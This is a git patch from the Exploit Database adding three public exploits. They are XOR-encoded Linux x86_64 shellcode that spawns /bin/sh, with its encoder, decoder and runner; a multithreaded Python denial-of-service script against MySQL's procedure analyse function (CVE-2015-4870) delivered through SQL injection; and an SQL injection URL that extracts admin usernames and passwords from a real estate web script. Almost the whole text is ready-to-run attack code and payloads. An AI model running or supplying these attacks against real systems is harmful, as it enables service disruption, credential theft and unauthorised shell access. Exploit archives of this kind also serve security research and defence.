From 22d168d0bc701ff106baf98dbd8a71efd2ba34a4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 31 May 2016 05:03:26 +0000 Subject: [PATCH] DB: 2016-05-31 3 new exploits MySQL 5.5.45 - procedure analyse Function Denial of Service Open Source Real Estate Script 3.6.0 - SQL Injection Linux x86_64 XOR Encode execve Shellcode --- files.csv | 3 + platforms/lin_x86-64/shellcode/39869.c | 241 +++++++++++++++++++++++++ platforms/multiple/dos/39867.py | 98 ++++++++++ platforms/php/webapps/39868.txt | 17 ++ 4 files changed, 359 insertions(+) create mode 100755 platforms/lin_x86-64/shellcode/39869.c create mode 100755 platforms/multiple/dos/39867.py create mode 100755 platforms/php/webapps/39868.txt diff --git a/files.csv b/files.csv index 7a3d477f5..84c6eeed4 100755 --- a/files.csv +++ b/files.csv @@ -36048,3 +36048,6 @@ id,file,description,date,author,platform,type,port 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 +39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 +39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 +39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 diff --git a/platforms/lin_x86-64/shellcode/39869.c b/platforms/lin_x86-64/shellcode/39869.c new file mode 100755 index 000000000..60460eaf0 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39869.c @@ -0,0 +1,241 @@ +/* + # Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode + # Date : 31-05-2016 + # Author : Roziul Hasan Khan Shifat + # Tested On : Ubuntu 14.04 LTS x86_64 +*/ + + +/* + main code + ------------------------ + +section .text + global _start +_start: + +xor rax,rax +xor rdx,rdx + +push rax +push rax + +mov [rsp],dword '//bi' +mov [rsp+4],dword 'n/sh' + + +mov rdi,rsp + + +push rax +push rax + +mov [rsp],word '-i' +mov rsi,rsp + +push rdx +push rsi +push rdi + +mov rsi,rsp + +add rax,59 +syscall + + + Disassembly + ------------------ +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor %rax,%rax + 400083: 48 31 d2 xor %rdx,%rdx + 400086: 50 push %rax + 400087: 50 push %rax + 400088: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp) + 40008f: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp) + 400096: 68 + 400097: 48 89 e7 mov %rsp,%rdi + 40009a: 50 push %rax + 40009b: 50 push %rax + 40009c: 66 c7 04 24 2d 69 movw $0x692d,(%rsp) + 4000a2: 48 89 e6 mov %rsp,%rsi + 4000a5: 52 push %rdx + 4000a6: 56 push %rsi + 4000a7: 57 push %rdi + 4000a8: 48 89 e6 mov %rsp,%rsi + 4000ab: 48 83 c0 3b add $0x3b,%rax + 4000af: 0f 05 syscall + +*/ + + +/* + + encoder + -------------- +I used a python script and a C program to encode shellcode + + + python script + --------------------- +a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05" +print "shellcode length %d"%len(a) +a=a[::-1] + +for i in range(len(a)-1): + print a[i].encode('hex') + + + C program + ----------------- + +#include +#include +main(int i,char *a[]) +{ +if(i!=2) +{ +printf("Usage %s \n",a[0]); +return 0; +} + + + +FILE *f,*o; +f=fopen(a[1],"r"); +int shell; + +o=fopen("shellencode.txt","w"); +if(!f || !o ) +{ +perror("FILE I/O error: "); +return 0; +} + +while( (fscanf(f,"%x",&shell)) !=EOF ) +{ +printf("%.2x\n",shell); +fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key +fflush(o); +} + + +fclose(o); +fclose(f); +return 0; +} + +--------------------------------------------------------------------------------------------------------------------------------- +I am sorry that My python script is very Poor .Search internet for better XOR encoder python script +MY Python script Reverse the shellcode +Then COPY & Paste the rerversed shellcode into a file +then i use the C program to encode reversed shellcode and write down shellencode.txt +----------------------------------------------------------------------------------------------------------------------------- + +*/ + + +/* + decoder + --------------- +section .text + global _start +_start: + +jmp shellcode + + +decoder: +pop rsi +xor rcx,rcx +mov cl,49 + +cdq + +mov dl,0x90 ;seed key + +decode: +xor rax,rax +mov al,[rsi] +xor al,dl +dec rsp +mov [rsp],byte al +inc rsi +loop decode + +call rsp + + +shellcode: +call decoder + db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1 + + + Disassembly + ------------------- + +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: eb 1d jmp 40009f + +0000000000400082 : + 400082: 5e pop %rsi + 400083: 48 31 c9 xor %rcx,%rcx + 400086: b1 31 mov $0x31,%cl + 400088: 99 cltd + 400089: b2 90 mov $0x90,%dl + +000000000040008b : + 40008b: 48 31 c0 xor %rax,%rax + 40008e: 8a 06 mov (%rsi),%al + 400090: 30 d0 xor %dl,%al + 400092: 48 ff cc dec %rsp + 400095: 88 04 24 mov %al,(%rsp) + 400098: 48 ff c6 inc %rsi + 40009b: e2 ee loop 40008b + 40009d: ff d4 callq *%rsp + +000000000040009f : + 40009f: e8 de ff ff ff callq 400082 + 4000a4: 95 xchg %eax,%ebp + 4000a5: 9f lahf + 4000a6: ab stos %eax,%es:(%rdi) + 4000a7: 50 push %rax + 4000a8: 13 d8 adc %eax,%ebx + 4000aa: 76 19 jbe 4000c5 + 4000ac: d8 c7 fadd %st(7),%st + 4000ae: c6 c2 76 mov $0x76,%dl + 4000b1: 19 d8 sbb %ebx,%eax + 4000b3: f9 stc + 4000b4: bd b4 94 57 f6 mov $0xf65794b4,%ebp + 4000b9: c0 c0 77 rol $0x77,%al + 4000bc: 19 d8 sbb %ebx,%eax + 4000be: f8 clc + 4000bf: e3 bf jrcxz 400080 <_start> + 4000c1: fe (bad) + 4000c2: 94 xchg %eax,%esp + 4000c3: b4 d4 mov $0xd4,%ah + 4000c5: 57 push %rdi + 4000c6: f9 stc + 4000c7: f2 bf bf b4 94 57 repnz mov $0x5794b4bf,%edi + 4000cd: c0 c0 42 rol $0x42,%al + 4000d0: a1 .byte 0xa1 + 4000d1: d8 50 a1 fcoms -0x5f(%rax) + +*/ + +/* +The shellcode decoder.asm is the encoded shellcode +*/ + + +char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1"; + + +int main(int i,char *a[]) +{ +(* (int(*)()) shellcode)(); + +} diff --git a/platforms/multiple/dos/39867.py b/platforms/multiple/dos/39867.py new file mode 100755 index 000000000..802ab0df0 --- /dev/null +++ b/platforms/multiple/dos/39867.py @@ -0,0 +1,98 @@ +#!/usr/bin/env python + +# Title: MySQL Procedure Analyse DoS Exploit +# Author: Osanda Malith Jayathissa (@OsandaMalith) +# E-Mail: osanda[cat]unseen.is +# Version: Vulnerable upto MySQL 5.5.45 +# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/ +# This exploit is compatible with both Python 3.x and 2.x +# CVE: CVE-2015-4870 + +from __future__ import print_function +import threading +import time +import sys +import os + +try: + import urllib.request as urllib2 + import urllib.parse as urllib + +except ImportError: + import urllib2 + import urllib + +try: input = raw_input +except NameError: pass + +host = "http://host/xxx.php?id=1'" + +payload = " procedure analyse((select*from(select 1)x),1)-- -" + +payload = urllib.quote(payload) +url = host + payload +req = urllib2.Request(url) +req.add_header('Accept', '*/*') +req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0') +#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455') +req.add_header('Connection', '') +req.add_header('Content-type', 'text/xml') +cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear') + +class DoS(threading.Thread): + def run(self): + print("{0} started!".format(self.getName())) + for i in range(100): + urllib2.urlopen(req) + + time.sleep(.2) + print("{0} finished!".format(self.getName())) + +def banner(): + print (''' + ____ _____ __ + /'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\ +/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\ +\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __ + \\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\ + \\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/ + \\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/ + /\\___/ + \\/__/ + ____ ____ + /\\ _`\\ /\\ _`\\ + \\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\ + \\ \\ \\ \\ \\ / __`\\/_\\__ \\ + \\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\ + \\ \\____/\\ \\____/\\ `\\____\\ + \\/___/ \\/___/ \\/_____/ + +[*] Author: Osanda Malith Jayathissa (@OsandaMalith) +[*] E-Mail: osanda[cat]unseen.is +[*] Website: http://osandamalith.wordpress.com +[!] Author takes no responsibility of any damage you cause +[!] Strictly for Educational purposes only +''') + print("[*] Host: {0}".format(host)) + input("\n\t[-] Press Return to launch the attack\n") + +def _start(): + try: + cls() + banner() + for i in range(10000): + thread = DoS(name = "[+] Thread-{0}".format(i + 1)) + thread.start() + time.sleep(.1) + + except KeyboardInterrupt: + print ('\n[!] Ctrl + C detected\n[!] Exiting') + sys.exit(0) + + except EOFError: + print ('\n[!] Ctrl + D detected\n[!] Exiting') + sys.exit(0) + +if __name__ == '__main__': + _start() + diff --git a/platforms/php/webapps/39868.txt b/platforms/php/webapps/39868.txt new file mode 100755 index 000000000..c17794686 --- /dev/null +++ b/platforms/php/webapps/39868.txt @@ -0,0 +1,17 @@ +# Exploit Title: real-estate classified script Sql Injection +# Date: 2015-05-29 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: +http://www.phpscriptsmall.com/product/open-source-real-estate-script/ +# Version: 3.6.0 + + +Exploit : +http://server/[path]/contact_view.php?contact=-99999+[SQl+Command] + +Test : +http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23 + +Admin Panel : http://server/admin/ + +